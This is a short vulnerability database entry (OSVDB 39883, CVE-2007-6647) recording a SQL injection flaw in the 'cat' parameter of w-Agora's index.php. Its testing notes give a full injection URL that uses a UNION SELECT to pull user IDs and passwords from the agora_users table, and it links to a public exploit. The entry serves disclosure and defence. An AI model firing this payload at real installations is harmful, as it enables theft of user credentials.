w-Agora index.php cat Variable SQL Injection

2007-12-30T00:00:00
ID OSVDB:39883
Type osvdb
Reporter OSVDB
Modified 2007-12-30T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/index.php?site=[site_name]&cat=-1//UNION//ALL//SELECT//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24//FROM//agora_users/*

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4817 CVE-2007-6647